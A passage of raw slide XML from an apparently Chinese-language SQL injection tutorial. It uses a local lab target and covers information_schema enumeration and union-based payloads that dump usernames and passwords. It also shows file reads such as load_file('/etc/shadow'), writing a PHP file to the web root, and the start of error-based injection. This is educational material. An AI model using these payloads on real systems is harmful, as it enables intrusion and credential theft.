                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实例中都有一个独立的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库，用来存储</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实例中所有其他数据库的基本信息。在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入过程中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库中包含的信息特别重要，存放了当前数据库管理系统中所有数据库信息，通过这个表我们可以去获取到存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入网站的表，列，等信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我们重点关注的表有如下几个，因为主要的时候主要利用这几个表来获取数据：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1. SCHEMATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，提供了当前 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库中所有数据库的信息。其中 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SCHEMA_NAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字段保存了所有的数据库名。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2. TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，提供了关于数据库中的表的信息。详细表述了某个表属于哪个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3. COLUMNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，提供了表中的列信息，详细表述了某张表的所有列以及每个列的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33C787FA-E0CB-7D18-CBFD-81CBF30987ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181142485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3" y="2365707"/>
            <a:ext cx="21908218" cy="6555641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询有多少个库并得到数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/cepo/?id -1' union select distinct 1,count(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dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/cepo/?id=-1' union select distinct 1,group_concat(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b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>得到表名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/cepo/?id=-1' union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>),3 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>='security’--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>得到列名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/cepo/?id=-1' union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>),3 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>='users'--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>得到数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/cepo/?id=-1' union select 1,group_concat(username),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(password) from users--+</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215" y="2899410"/>
            <a:ext cx="21250275" cy="7847330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、文件读写</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用前提：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要当前用户具有相应文件权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用命令select file_priv from mysql.user where user='root'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询当前用户文件操作权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>file_priv的值需为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="0" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要后台数据库开启secure-file-priv参数的设置。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路径，可通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>show global variables like '%secure%'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行查询。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>secure_file_priv设置值及含义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1428750" lvl="2" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>secure_file_priv=null	限制mysqld 不允许导入或导出</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secure_file_priv=/tmp/	限制mysqld 的导入或导出只能发生在/tmp/目录下</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1428750" lvl="2" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>secure_file_priv=''		不对mysqld 的导入或导出做限制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1428750" lvl="2" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要知道文件的绝对路径。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取文件，使用load_file()函数读取文件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入命令例如：?id=1 union select 1,load_file('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'),3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>写入文件，使用select……into_outfile'路径'导出数据到指定目录下。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入命令例如：?id=1 union select 1,'&lt;?php phpinfo();?&gt;',3 into_outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\test.php'</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9557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en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>报错注入在没法用union联合查询时用，但前提还是不能过滤一些关键的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。	报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>此处主要介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xpath语法错误和concat+rand()+group_by()导致主键重复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>错误的情况。</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适用情况：未关闭数据库报错函数，对于一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句的错误直接回显在页面上，且未对一些具有报错功能的函数（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等）进行过滤。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xpath语法错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用xpath语法错误来进行报错注入主要利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
